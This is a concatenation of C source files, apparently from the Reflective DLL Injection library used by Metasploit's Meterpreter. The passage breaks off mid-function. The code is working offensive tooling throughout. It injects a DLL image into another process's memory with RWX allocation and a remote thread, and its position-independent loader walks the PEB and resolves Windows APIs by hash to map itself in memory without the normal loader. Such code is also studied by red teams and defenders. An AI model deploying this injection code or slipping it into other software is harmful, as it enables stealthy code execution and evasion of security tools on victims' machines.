// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "LoadLibraryR.h"
//===============================================================================================//
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
//===============================================================================================//
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef _WIN64
DWORD dwMeterpreterArch = 2;
#else
// This will catch Win32 and WinRT.
DWORD dwMeterpreterArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwMeterpreterArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwMeterpreterArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
//===============================================================================================//
// Loads a DLL image from memory via its exported ReflectiveLoader function
HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
{
HMODULE hResult = NULL;
DWORD dwReflectiveLoaderOffset = 0;
DWORD dwOldProtect1 = 0;
DWORD dwOldProtect2 = 0;
REFLECTIVELOADER pReflectiveLoader = NULL;
DLLMAIN pDllMain = NULL;
if( lpBuffer == NULL || dwLength == 0 )
return NULL;
__try
{
// check if the library has a ReflectiveLoader...
dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
if( dwReflectiveLoaderOffset != 0 )
{
pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
{
// call the librarys ReflectiveLoader...
pDllMain = (DLLMAIN)pReflectiveLoader();
if( pDllMain != NULL )
{
// call the loaded librarys DllMain to get its HMODULE
// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only.
if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )
hResult = NULL;
}
// revert to the previous protection flags...
VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
}
}
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
hResult = NULL;
}
return hResult;
}
//===============================================================================================//
// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// defined in order to use the correct RDI prototypes.
// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
// Note: This function currently cant inject accross architectures, but only to architectures which are the
// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
{
LPVOID lpRemoteLibraryBuffer = NULL;
LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
HANDLE hThread = NULL;
DWORD dwReflectiveLoaderOffset = 0;
DWORD dwThreadId = 0;
__try
{
do
{
if( !hProcess || !lpBuffer || !dwLength )
break;
// check if the library has a ReflectiveLoader...
dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
if( !dwReflectiveLoaderOffset )
break;
// alloc memory (RWX) in the host process for the image...
lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if( !lpRemoteLibraryBuffer )
break;
// write the image into the host process...
if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
break;
// add the offset to ReflectiveLoader() to the remote library address...
lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
// create a remote thread in the host process to call the ReflectiveLoader!
hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
} while( 0 );
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
hThread = NULL;
}
return hThread;
}
//===============================================================================================//

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//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
//===============================================================================================//
#endif
//===============================================================================================//

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//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

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//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#pragma intrinsic( _ReturnAddress )
// This function can not be inlined by the compiler or we will not get the address we expect. Ideally
// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
// available (and no inline asm available under x64).
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
//===============================================================================================//
#ifdef ENABLE_OUTPUTDEBUGSTRING
#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
#else /* ENABLE_OUTPUTDEBUGSTRING */
#define OUTPUTDBG(str) do{}while(0)
#endif
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA = NULL;
GETPROCADDRESS pGetProcAddress = NULL;
VIRTUALALLOC pVirtualAlloc = NULL;
NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
#ifdef ENABLE_STOPPAGING
VIRTUALLOCK pVirtualLock = NULL;
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
OUTPUTDEBUG pOutputDebug = NULL;
#endif
USHORT usCounter;
// the initial location of this image in memory
ULONG_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
ULONG_PTR uiBaseAddress;
// variables for processing the kernels export table
ULONG_PTR uiAddressArray;
ULONG_PTR uiNameArray;
ULONG_PTR uiExportDir;
ULONG_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
ULONG_PTR uiHeaderValue;
ULONG_PTR uiValueA;
ULONG_PTR uiValueB;
ULONG_PTR uiValueC;
ULONG_PTR uiValueD;
ULONG_PTR uiValueE;
// STEP 0: calculate our images current base address
// we will start searching backwards from our callers return address.
uiLibraryAddress = caller();
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
#ifdef WIN_ARM
uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
#else _WIN32
uiBaseAddress = __readfsdword( 0x30 );
#endif
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the module name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
#ifdef ENABLE_STOPPAGING
usCounter++;
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
usCounter++;
#endif
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH
|| dwHashValue == GETPROCADDRESS_HASH
|| dwHashValue == VIRTUALALLOC_HASH
#ifdef ENABLE_STOPPAGING
|| dwHashValue == VIRTUALLOCK_HASH
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
|| dwHashValue == OUTPUTDEBUG_HASH
#endif
)
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
#ifdef ENABLE_STOPPAGING
else if( dwHashValue == VIRTUALLOCK_HASH )
pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
else if( dwHashValue == OUTPUTDEBUG_HASH )
pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
#endif
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
else if( (DWORD)uiValueC == NTDLLDLL_HASH )
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 1;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
// we stop searching when we have found everything we need.
if( pLoadLibraryA
&& pGetProcAddress
&& pVirtualAlloc
#ifdef ENABLE_STOPPAGING
&& pVirtualLock
#endif
&& pNtFlushInstructionCache
#ifdef ENABLE_OUTPUTDEBUGSTRING
&& pOutputDebug
#endif
)
break;
// get the next entry
uiValueA = DEREF( uiValueA );
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
#ifdef ENABLE_STOPPAGING
// prevent our image from being swapped to the pagefile
pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
#endif
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
while( uiValueA-- )
*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
while( uiValueE-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
while( uiValueD-- )
*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume there is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// iterate through all imports until a null RVA is found (Characteristics is mis-named)
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
{
OUTPUTDBG("Loading library: ");
OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
OUTPUTDBG("\n");
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
if ( !uiLibraryAddress )
{
OUTPUTDBG("Loading library FAILED\n");
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
continue;
}
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
OUTPUTDBG("Resolving function: ");
OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
OUTPUTDBG("\n");
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( ULONG_PTR );
if( uiValueD )
uiValueD += sizeof( ULONG_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
